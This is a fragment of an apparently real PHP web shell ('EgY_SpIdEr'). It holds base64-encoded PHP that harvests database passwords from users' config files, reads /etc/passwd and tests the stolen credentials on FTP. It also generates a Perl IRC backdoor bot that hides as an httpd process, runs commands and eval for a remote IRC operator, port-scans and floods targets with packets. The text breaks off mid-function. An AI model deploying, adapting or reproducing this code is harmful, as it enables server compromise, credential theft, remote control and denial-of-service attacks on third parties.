pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPGZvbnQgY29sb3I9IiArIHkgKyI+IitYKyI8L2ZvbnQ+IjsNCg0KfQ0KZnVuY3Rpb24gYigpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPEI+IitYKyI8L0I+IjsNCg0KfQ0KZnVuY3Rpb24gdSgpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPFU+IitYKyI8L1U+IjsNCg0KfQ0KZnVuY3Rpb24gaSgpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPEk+IitYKyI8L0k+IjsNCg0KfQ0KZnVuY3Rpb24gbWFyKCl7DQp2YXIgWCA9IHByb21wdCgiRW50ZXIgVGV4dCIsIiIpDQppZiAoWD09IiIgfCBYPT1udWxsICkgew0KcmV0dXJuOw0KfQ0KaW5kZXhmb3JtLmluZGV4LnZhbHVlPWluZGV4Zm9ybS5pbmRleC52YWx1ZSArICI8bWFycXVlZT4iK1grIjwvbWFycXVlZT4iOw0KDQp9DQpmdW5jdGlvbiBpbWcoKXsNCnZhciBYID0gcHJvbXB0KCJFbnRlciBsaW5rIiwiIikNCmlmIChYPT0iIiB8IFg9PW51bGwgKSB7DQpyZXR1cm47DQp9DQppbmRleGZvcm0uaW5kZXgudmFsdWU9aW5kZXhmb3JtLmluZGV4LnZhbHVlICsgIjxpbWcgc3JjPSciK1grIic+PC9pbWc+IjsNCg0KfQ0KZnVuY3Rpb24gYnIoKXsNCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPGJyPiI7DQoNCn0NCjwvc2NyaXB0Pg0KPHRhYmxlIGJvcmRlcj0iMSIgYm9yZGVyY29sb3I9IiMwMDgwMDAiIGJvcmRlcmNvbG9yZGFyaz0iIzAwODAwMCINCmJvcmRlcmNvbG9ybGlnaHQ9IiMwMDgwMDAiPjx0aD48YSBvbmNsaWNrPSdyZXR1cm4gY2VudGVyKCknPkNlbnRlcjwvYT4gfHx8IDxhIG9uY2xpY2s9J3JldHVybiBsZWZ0KCknPkxlZnQ8L2E+IHx8fCA8YSBvbmNsaWNrPSdyZXR1cm4gcmlnaHQoKSc+cmlnaHQ8L2E+IHx8fCA8YSBvbmNsaWNrPSdyZXR1cm4gYigpJz5Cb2xkPC9hPiB8fHwgPGEgb25jbGljaz0ncmV0dXJuIHUoKSc+VW5kZXJMaW5lPC9hPiB8fHwgPGEgb25jbGljaz0ncmV0dXJuIGkoKSc+SXRhbGljPC9hPiB8fHwgPGEgb25jbGljaz0ncmV0dXJuIGJyKCknPk5ld0xpbmU8L2E+IHx8fCA8YSBvbmNsaWNrPSdyZXR1cm4gY29sb3VyKCknPkNvbG91cjwvYT4gfHx8IDxhIG9uY2xpY2s9J3JldHVybiBtYXIoKSc+TWFycXVlZSB8fHwgPGEgb25jbGljaz0ncmV0dXJuIGltZygpJz5QaWN0dXJlPC9hPiB8fHwgPGEgb25jbGljaz0ncmV0dXJuIGxpbmsoKSc+TGluazwvYT48L2E+PC90aD48dHI+PFREPg0KPGNlbnRlcj48Zm9ybSBuYW1lPSJpbmRleGZvcm0iIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPjx0ZXh0YXJlYSBuYW1lPSdpbmRleCcgcm93cz0nMTQnIGNvbHM9Jzg2Jz48L3RleHRhcmVhPjwvcD4NCjwvZm9ybT48L2Zvcm0+PC9jZW50ZXI+DQo8L1REPjwvdHI+PHRyPjx0ZD5Db3B5IFRoZSBDb2RlIGFmdGVyIEZpbmlzaGluZyB5b3VyIGluZGV4PC90ZD48L3RyPjwvdGFibGU+DQo8Pw0KfQ0KPz4NCjxociBjb2xvcj0iIzAwRkYwMCIgLz4NCjx0YWJsZSBib3JkZXI9IjEiIGJnY29sb3I9IiMwMDAwMDAiIGJvcmRlcmNvbG9yPSJsaW1lIg0KYm9yZGVyY29sb3JkYXJrPSJsaW1lIiBib3JkZXJjb2xvcmxpZ2h0PSJsaW1lIj48dHI+PHRkPjxhIGhyZWY9Ij8iPk1haW4gU2hlbGw8L2E+PC90ZD48dGQ+PGEgaHJlZj0iP2FjdD11c2VycyI+TGlzdCBVc2VyczwvYT48L3RkPjx0ZD48YSBocmVmPSI/YWN0PWluZGV4Ij5JbmRleCBNYWtlcjwvYT48L3RkPjx0ZD48YSBocmVmPSI/YWN0PWNvbmZpZyI+UmVhZENvbmZpZzwvYT48L3RkPjwvdHI+PC90YWJsZT4NCjxwIGFsaWduPSJjZW50ZXIiPnd3dy5lZ3lzcGlkZXIuZXU8L3A+DQo8RElWIGlkPSJuIiBhbGlnbj0iY2VudGVyIj4NCiAgPFRBQkxFIGJvcmRlckNvbG9yPSIjMTExMTExIiBjZWxsU3BhY2luZz0iMCIgY2VsbFBhZGRpbmc9IjAiIHdpZHRoPSIxMDAlIiBib3JkZXI9IjEiPg0KICAgIDxUQk9EWT4NCiAgICAgIDxUUj4NCiAgICAgICAgPFREIHdpZHRoPSIxMDAlIj48cCBhbGlnbj0iY2VudGVyIj48U1RST05HPm8tLS1bIEVnWV9TcElkRXIgfCB8IDxBIGVneV9zcGlkZXJAaG90bWFpbC5jb20+ZWd5X3NwaWRlckBob3RtYWlsLmNvbTwvQT4gICBdLS0tbzwvU1RST05HPjwvcD48L1REPg0KICAgICAgPC9UUj4NCiAgICA8L1RCT0RZPg0KICA8L1RBQkxFPg0KPC9ESVY+DQo8L2NlbnRlcj4gDQogPC9ib2R5Pg0KPC9odG1sPg="; + + +$egy_cp="PD9waHAgDQplY2hvICI8aHRtbD4iOyANCmVjaG8gIjx0aXRsZT5FZ1lfU3BJZEVyIFNoRWxMIDwvdGl0bGU+PFNUWUxFPg0KDQpCT0RZDQogew0KICAgICAgICBTQ1JPTExCQVItRkFDRS1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLUhJR0hMSUdIVC1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLVNIQURPVy1DT0xPUjogIzAwMDAwMDsgQ09MT1I6ICM2NjY2NjY7IFNDUk9MTEJBUi0zRExJR0hULUNPTE9SOiAjNzI2NDU2OyBTQ1JPTExCQVItQVJST1ctQ09MT1I6ICM3MjY0NTY7IFNDUk9MTEJBUi1UUkFDSy1DT0xPUjogIzI5MjkyOTsgRk9OVC1GQU1JTFk6IFZlcmRhbmE7IFNDUk9MTEJBUi1EQVJLU0hBRE9XLUNPTE9SOiAjNzI2NDU2DQp9DQoNCi50ZDEgew0KQk9SREVSOiAxOw0KZm9udDogN3B0IHRhaG9tYTsNCmNvbG9yOiAjZmZmZmZmOw0KfQ0KDQoudHIxIHsNCkJPUkRFUjogMTsNCmNvbG9yOiAjMzMzMzMzOw0KfQ0KdGFibGUgew0KQk9SREVSOiAgI2VlZWVlZSAgb3V0c2V0Ow0KQkFDS0dST1VORC1DT0xPUjogIzAwMDAwMDsNCmNvbG9yOiAjMzMzMzMzOw0KfQ0KdGV4dGFyZWEgew0KQk9SREVSLVJJR0hUOiAgI2ZmZmZmZiAxIHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUxFRlQ6ICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUJPVFRPTTogI2ZmZmZmZiAxIHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjogIzMzMzMzMzsNCmZvbnQ6IEZpeGVkc3lzIGJvbGQ7DQpjb2xvcjogI2ZmZmZmZjsNCn0NCkJPRFkgew0KbWFyZ2luOiAxOw0KY29sb3I6ICMzMzMzMzM7DQpiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOw0KfQ0KQTpsaW5rIHtDT0xPUjpyZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZX0NCkE6dmlzaXRlZCB7IENPTE9SOnJlZDsgVEVYVC1ERUNPUkFUSU9OOiBub25lfQ0KQTphY3RpdmUge0NPTE9SOnJlZDsgVEVYVC1ERUNPUkFUSU9OOiBub25lfQ0KQTpob3ZlciB7Y29sb3I6Ymx1ZTtURVhULURFQ09SQVRJT046IG5vbmV9DQoNCjwvU1RZTEU+PGJvZHk+IjsgDQoNCnNldF90aW1lX2xpbWl0KDApOyANCiMjIyMjIyMjIyMjIyMjIyMjIyANCkAkcGFzc3dkPWZvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKTsgDQppZiAoISRwYXNzd2QpIHsgDQogIGVjaG8gIlstXSBFcnJvciA6IGNvdWRuJ3QgcmVhZCAvZXRjL3Bhc3N3ZCI7IA0KICBleGl0OyANCn0gDQokcGF0aF90b19wdWJsaWM9YXJyYXkoKTsgDQokdXNlcnM9YXJyYXkoKTsgDQokcGF0aHRvY29uZj1hcnJheSgpOyANCiRpPTA7IA0KDQp3aGlsZSghZmVvZigkcGFzc3dkKSkgeyANCiRzdHI9ZmdldHMoJHBhc3N3ZCk7IA0KaWYgKCRpPjM1KSB7IA0KICAgJHBvcz1zdHJwb3MoJHN0ciwiOiIpOyANCiAgICR1c2VybmFtZT1zdWJzdHIoJHN0ciwwLCRwb3MpOyANCiAgICRkaXJ6PSIvaG9tZS8kdXNlcm5hbWUvcHVibGljX2h0bWwvIjsgDQogICBpZiAoKCR1c2VybmFtZSE9IiIpKSB7IA0KICAgICAgIGlmIChpc19yZWFkYWJsZSgkZGlyeikpIHsgDQogICAgICAgICAgIGFycmF5X3B1c2goJHVzZXJzLCR1c2VybmFtZSk7IA0KICAgICAgICAgICBhcnJheV9wdXNoKCRwYXRoX3RvX3B1YmxpYywkZGlyeik7IA0KICAgICAgIH0gDQogICB9IA0KfSANCiRpKys7IA0KfSANCiMjIyMjIyMjIyMjIyMjIyMjIyMgDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgDQplY2hvICI8YnI+PGJyPiI7IA0KZWNobyAiPHRleHRhcmVhIG5hbWU9J21haW5fd2luZG93JyBjb2xzPTEwMCByb3dzPTIwPiI7IA0KDQplY2hvICJbK10gRm91bmRlZCAiLnNpemVvZigkdXNlcnMpLiIgZW50cnlzIGluIC9ldGMvcGFzc3dkXG4iOyANCmVjaG8gIlsrXSBGb3VuZGVkICIuc2l6ZW9mKCRwYXRoX3RvX3B1YmxpYykuIiByZWFkYWJsZSBwdWJsaWNfaHRtbCBkaXJlY3Rvcmllc1xuIjsgDQoNCmVjaG8gIlt+XSBTZWFyY2hpbmcgZm9yIHBhc3N3b3JkcyBpbiBjb25maWcuKiBmaWxlcy4uLlxuXG4iOyANCmZvcmVhY2ggKCR1c2VycyBhcyAkdXNlcikgeyANCiAgICAgICAkcGF0aD0iL2hvbWUvJHVzZXIvcHVibGljX2h0bWwvIjsgDQogICAgICAgcmVhZF9kaXIoJHBhdGgsJHVzZXIpOyANCn0gDQoNCmVjaG8gIlxuWytdIERvbmVcbiI7IA0KDQpmdW5jdGlvbiByZWFkX2RpcigkcGF0aCwkdXNlcm5hbWUpIHsgDQogICBpZiAoJGhhbmRsZSA9IG9wZW5kaXIoJHBhdGgpKSB7IA0KICAgICAgIHdoaWxlIChmYWxzZSAhPT0gKCRmaWxlID0gcmVhZGRpcigkaGFuZGxlKSkpIHsgDQogICAgICAgICAgICAgJGZwYXRoPSIkcGF0aCRmaWxlIjsgDQogICAgICAgICAgICAgaWYgKCgkZmlsZSE9Jy4nKSBhbmQgKCRmaWxlIT0nLi4nKSkgeyANCiAgICAgICAgICAgICAgICBpZiAoaXNfcmVhZGFibGUoJGZwYXRoKSkgeyANCiAgICAgICAgICAgICAgICAgICAkZHI9IiRmcGF0aC8iOyANCiAgICAgICAgICAgICAgICAgICBpZiAoaXNfZGlyKCRkcikpIHsgDQogICAgICAgICAgICAgICAgICAgICAgcmVhZF9kaXIoJGRyLCR1c2VybmFtZSk7IA0KICAgICAgICAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgZWxzZSB7IA0KICAgICAgICAgICAgICAgICAgICAgICAgaWYgKCgkZmlsZT09J2NvbmZpZy5waHAnKSBvciAoJGZpbGU9PSdjb25maWcuaW5jLnBocCcpIG9yICgkZmlsZT09J2RiLmluYy5waHAnKSBvciAoJGZpbGU9PSdjb25uZWN0LnBocCcpIG9yICgkZmlsZT09J3dwLWNvbmZpZy5waHAnKSBvciAoJGZpbGU9PSd2YXIucGhwJykgb3IgKCRmaWxlPT0nY29uZmlndXJlLnBocCcpIG9yICgkZmlsZT09J2RiLnBocCcpIG9yICgkZmlsZT09J2RiX2Nvbm5lY3QucGhwJykpIHsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAkcGFzcz1nZXRfcGFzcygkZnBhdGgpOyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkcGFzcyE9JycpIHsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlY2hvICJbK10gJGZwYXRoXG4kcGFzc1xuIjsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmdHBfY2hlY2soJHVzZXJuYW1lLCRwYXNzKTsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICB9IA0KICAgICAgICAgICAgICAgICAgICAgICAgfSANCiAgICAgICAgICAgICAgICAgICB9IA0KICAgICAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgfSANCiAgICAgICB9IA0KICAgfSANCn0gDQoNCmZ1bmN0aW9uIGdldF9wYXNzKCRsaW5rKSB7IA0KICAgQCRjb25maWc9Zm9wZW4oJGxpbmssJ3InKTsgDQogICB3aGlsZSghZmVvZigkY29uZmlnKSkgeyANCiAgICAgICAkbGluZT1mZ2V0cygkY29uZmlnKTsgDQogICAgICAgaWYgKHN0cnN0cigkbGluZSwncGFzcycpIG9yIHN0cnN0cigkbGluZSwncGFzc3dvcmQnKSBvciBzdHJzdHIoJGxpbmUsJ3Bhc3N3ZCcpKSB7IA0KICAgICAgICAgICBpZiAoc3RycnBvcygkbGluZSwnIicpKSANCiAgICAgICAgICAgICAgJHBhc3M9c3Vic3RyKCRsaW5lLChzdHJwb3MoJGxpbmUsJz0nKSszKSwoc3RycnBvcygkbGluZSwnIicpLShzdHJwb3MoJGxpbmUsJz0nKSszKSkpOyANCiAgICAgICAgICAgZWxzZSANCiAgICAgICAgICAgICAgJHBhc3M9c3Vic3RyKCRsaW5lLChzdHJwb3MoJGxpbmUsJz0nKSszKSwoc3RycnBvcygkbGluZSwiJyIpLShzdHJwb3MoJGxpbmUsJz0nKSszKSkpOyANCiAgICAgICAgICAgcmV0dXJuICRwYXNzOyANCiAgICAgICB9IA0KICAgfSANCn0gDQoNCmZ1bmN0aW9uIGZ0cF9jaGVjaygkbG9naW4sJHBhc3MpIHsgDQogICAgQCRmdHA9ZnRwX2Nvbm5lY3QoJzEyNy4wLjAuMScpOyANCiAgICBpZiAoJGZ0cCkgeyANCiAgICAgICBAJHJlcz1mdHBfbG9naW4oJGZ0cCwkbG9naW4sJHBhc3MpOyANCiAgICAgICBpZiAoJHJlcykgeyANCiAgICAgICAgICBlY2hvICdbRlRQXSAnLiRsb2dpbi4nOicuJHBhc3MuIiAgU3VjY2Vzc1xuIjsgDQogICAgICAgfSANCiAgICAgICBlbHNlIGZ0cF9xdWl0KCRmdHApOyANCiAgICB9IA0KfSANCg0KZWNobyAiPC90ZXh0YXJlYT48YnI+IjsgDQoNCmVjaG8gIjwvYm9keT48L2h0bWw+IjsgDQo/Pg="; + + + + +if(!empty($_POST['ircadmin']) AND !empty($_POST['ircserver']) AND !empty($_POST['ircchanal']) AND !empty($_POST['ircname'])) +{ +$ircadmin=$_POST['ircadmin']; +$ircserver=$_POST['ircserver']; +$ircchan=$_POST['ircchanal']; +$irclabel=$_POST['ircname']; +echo "OverclockiX Shell-Connector || Connecting to $ircserver<title>"; +echo "<body bgcolor=\"black\" text=\"green\">"; +echo "Now Connecting to <b><font color=\"red\">$ircserver</font></b> in <b><font color=\"yellow\">$ircchan</font></b> Andministrators: <b><font color=\"yellow\">$ircadmin</font></b> Botname is <b><font color=\"yellow\">$irclabel</font></b>"; +echo "<p>Dont Forget to Delete Loader.pl in /tmp</p>"; +####################################################### +######################IRC Trojan########################## +$file=" +################ CONFIGURACAO ################################################################# +my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps # +#----------------------------------------------################################################ +my \$linas_max='48'; # Evita o flood :) depois de X linhas # +#----------------------------------------------################################################ +my \$sleep='4'; # ele dorme X segundos # +##################### IRC ##################################################################### +my @adms=(\"$ircadmin\"); # Nick do administrador # +#----------------------------------------------################################################ +my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") # +#----------------------------------------------################################################ +my \$nick='$irclabel'; # Nick do bot. Caso esteja em uso vai aparecer # + # aparecer com numero radonamico no final # +#----------------------------------------------################################################ +my \$ircname = 'Linux'; # User ID # +#----------------------------------------------################################################ +chop (my \$realname = `uname -a`); # Full Name # +#----------------------------------------------################################################ +\$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado # + # caso n?o seja especificado no argumento # +#----------------------------------------------################################################ +my \$porta='6667'; # Porta do servidor de irc # +################ ACESSO A SHELL ############################################################### +my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell # +############################################################################################### +my \$VERSAO = '0.2'; +\$SIG{'INT'} = 'IGNORE'; +\$SIG{'HUP'} = 'IGNORE'; +\$SIG{'TERM'} = 'IGNORE'; +\$SIG{'CHLD'} = 'IGNORE'; +\$SIG{'PS'} = 'IGNORE'; +\$SIG{'STOP'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir(\"/\"); +\$servidor=\"\$ARGV[0]\" if \$ARGV[0]; +$0=\"\$processo\".\"\0\"x16;; +my \$pid=fork; +exit if \$pid; +die \"Problema com o fork: $!\" unless defined(\$pid); +my \$dcc_sel = new IO::Select->new(); +############################# +# B0tchZ na veia ehehe :P # +############################# + + +\$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my \$socket = \$_[0]; + print \$socket \"\$_[1]\\n\"; + } else { + print \$IRC_cur_socket \"\$_[0]\\n\"; + } +} +################################# +sub conectar { + my \$meunick = \$_[0]; + my \$servidor_con = \$_[1]; + my \$porta_con = \$_[2]; + + + my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1); + if (defined(\$IRC_socket)) { + \$IRC_cur_socket = \$IRC_socket; + + + \$IRC_socket->autoflush(1); + \$sel_cliente->add(\$IRC_socket); + + + \$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\"; + \$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\"; + \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; + \$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost; + nick(\"\$meunick\"); + sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\"); + sleep 1; + } +} ##################### + + +my \$line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); } + delete(\$irc_servers{''}) if (defined(\$irc_servers{''})); + &DCC::connections; + my @ready = \$sel_cliente->can_read(0); + next unless(@ready); + foreach \$fh (@ready) { + \$IRC_cur_socket = \$fh; + \$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'}; + \$nread = sysread(\$fh, \$msg, 4096); + if (\$nread == 0) { + \$sel_cliente->remove(\$fh); + \$fh->close; + delete(\$irc_servers{\$fh}); + } + @lines = split (/\\n/, \$msg); + + + for(my \$c=0; \$c<= $#lines; \$c++) { + \$line = \$lines[\$c]; + \$line=\$line_temp.\$line if (\$line_temp); + \$line_temp=''; + \$line =~ s/\\r$//; + unless (\$c == $#lines) { + parse(\"\$line\"); + } else { + if ($#lines == 0) { + parse(\"\$line\"); + } elsif (\$lines[\$c] =~ /\\r$/) { + parse(\"\$line\"); + } elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse(\"\$line\"); + } else { + \$line_temp = \$line; + } + } + } + } +} + + +######################### + + + + +sub parse { + my \$servarg = shift; + if (\$servarg =~ /^PING \:(.*)/) { + sendraw(\"PONG :$1\"); + } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my \$pn=$1; my \$onde = $4; my \$args = $5; + if (\$args =~ /^\\001VERSION\\001$/) { + notice(\"\$pn\", \"\\001VERSION ShellBOT-\$VERSAO por 0ldW0lf\\001\"); + } + if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) { + if (\$onde eq \"\$meunick\"){ + shell(\"\$pn\", \"\$args\"); + } + if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) { + my \$natrix = $1; + my \$arg = $2; + if (\$arg =~ /^\!(.*)/) { + ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/); + } elsif (\$arg =~ /^\@(.*)/) { + \$ondep = \$onde; + \$ondep = \$pn if \$onde eq \$meunick; + bfunc(\"\$ondep\",\"$1\"); + } else { + shell(\"\$onde\", \"\$arg\"); + } + } + } + } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + if (lc($1) eq lc(\$meunick)) { + \$meunick=$4; + \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; + } + } elsif (\$servarg =~ m/^\:(.+?)\s+433/i) { + nick(\"\$meunick\".int rand(9999)); + } elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + \$meunick = $2; + \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; + \$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\"; + foreach my \$canal (@canais) { + sendraw(\"JOIN \$canal\"); + } + } +} +########################## + + +sub bfunc { + my \$printl = \$_[0]; + my \$funcarg = \$_[1]; + if (my \$pid = fork) { + waitpid(\$pid, 0); + } else { + if (fork) { + exit; + } else { + if (\$funcarg =~ /^portscan (.*)/) { + my \$hostip=\"$1\"; + my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\"); + my (@aberta, %porta_banner); + foreach my \$porta (@portas) { + my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4); + if (\$scansock) { + push (@aberta, \$porta); + \$scansock->close; + } + } + + + if (@aberta) { + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\"); + } else { + sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\"); + } + } + if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) { + my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\"); + \$dtime = 1 if \$dtime == 0; + my %bytes; + \$bytes{igmp} = $2 * \$pacotes{igmp}; + \$bytes{icmp} = $2 * \$pacotes{icmp}; + \$bytes{o} = $2 * \$pacotes{o}; + \$bytes{udp} = $2 * \$pacotes{udp}; + \$bytes{tcp} = $2 * \$pacotes{tcp}; + + + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002 - Status GERAL -\\002\"); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Tempo\\002: \$dtime\".\"s\"); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total pacotes\\002: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o})); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total bytes\\002: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o})); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Media de envio\\002: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\"); + + + } + exit; + } + } +} +########################## + + + + +sub ircase { + my (\$kem, \$printl, \$case) = @_; + + + + + if (\$case =~ /^join (.*)/) { + j(\"$1\"); + } + if (\$case =~ /^part (.*)/) { + p(\"$1\"); + } + if (\$case =~ /^rejoin\s+(.*)/) { + my \$chan = $1; + if (\$chan =~ /^(\d+) (.*)/) { + for (my \$ca = 1; \$ca <= $1; \$ca++ ) { + p(\"$2\"); + j(\"$2\"); + } + } else { + p(\"\$chan\"); + j(\"\$chan\"); + } + } + if (\$case =~ /^op/) { + op(\"\$printl\", \"\$kem\") if \$case eq \"op\"; + my \$oarg = substr(\$case, 3); + op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^deop/) { + deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\"; + my \$oarg = substr(\$case, 5); + deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^voice/) { + voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\"; + \$oarg = substr(\$case, 6); + voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^devoice/) { + devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\"; + \$oarg = substr(\$case, 8); + devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^msg\s+(\S+) (.*)/) { + msg(\"$1\", \"$2\"); + } + if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { + for (my \$cf = 1; \$cf <= $1; \$cf++) { + msg(\"$2\", \"$3\"); + } + } + if (\$case =~ /^ctcp\s+(\S+) (.*)/) { + ctcp(\"$1\", \"$2\"); + } + if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { + for (my \$cf = 1; \$cf <= $1; \$cf++) { + ctcp(\"$2\", \"$3\"); + } + } + if (\$case =~ /^invite\s+(\S+) (.*)/) { + invite(\"$1\", \"$2\"); + } + if (\$case =~ /^nick (.*)/) { + nick(\"$1\"); + } + if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) { + conectar(\"$2\", \"$1\", 6667); + } + if (\$case =~ /^send\s+(\S+)\s+(\S+)/) { + DCC::SEND(\"$1\", \"$2\"); + } + if (\$case =~ /^raw (.*)/) { + sendraw(\"$1\"); + } + if (\$case =~ /^eval (.*)/) { + eval \"$1\"; + } +} +########################## + + +sub shell { + return unless \$secv; + my \$printl=\$_[0]; + my \$comando=\$_[1]; + if (\$comando =~ /cd (.*)/) { + chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench :D \"); + return; + } + elsif (\$pid = fork) { + waitpid(\$pid, 0); + } else { + if (fork) { + exit; + } else { + my @resp=`\$comando 2>&1 3>&1`; + my \$c=0; + foreach my \$linha (@resp) { + \$c++; + chop \$linha; + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\"); + if (\$c == \"\$linas_max\") { + \$c=0; + sleep \$sleep; + } + } + exit; + } + } +} + + +#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki +sub attacker { + my \$iaddr = inet_aton(\$_[0]); + my \$msg = 'B' x \$_[1]; + my \$ftime = \$_[2]; + my \$cp = 0; + my (%pacotes); + \$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0; + + + socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++; + socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++; + socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++; + socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++; + return(undef) if \$cp == 4; + my \$itime = time; + my (\$cur_time); + while ( 1 ) { + for (my \$porta = 1; \$porta <= 65535; \$porta++) { + \$cur_time = time - \$itime; + last if \$cur_time >= \$ftime; + send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++; + send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++; + send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++; + send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++; + + + # DoS ?? :P + for (my \$pc = 3; \$pc <= 255;\$pc++) { + next if \$pc == 6; + \$cur_time = time - \$itime; + last if \$cur_time >= \$ftime; + socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next; + send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;; + } + } + last if \$cur_time >= \$ftime; + } + return(\$cur_time, %pacotes); +} + + +############# +# ALIASES # +############# + + +sub action { + return unless $#_ == 1; + sendraw(\"PRIVMSG \$_[0] :\\001ACTION \$_[1]\\001\"); +} + + +sub ctcp { + return unless $#_ == 1; + sendraw(\"PRIVMSG \$_[0] :\\001\$_[1]\\001\"); +} +sub msg { + return unless $#_ == 1; + 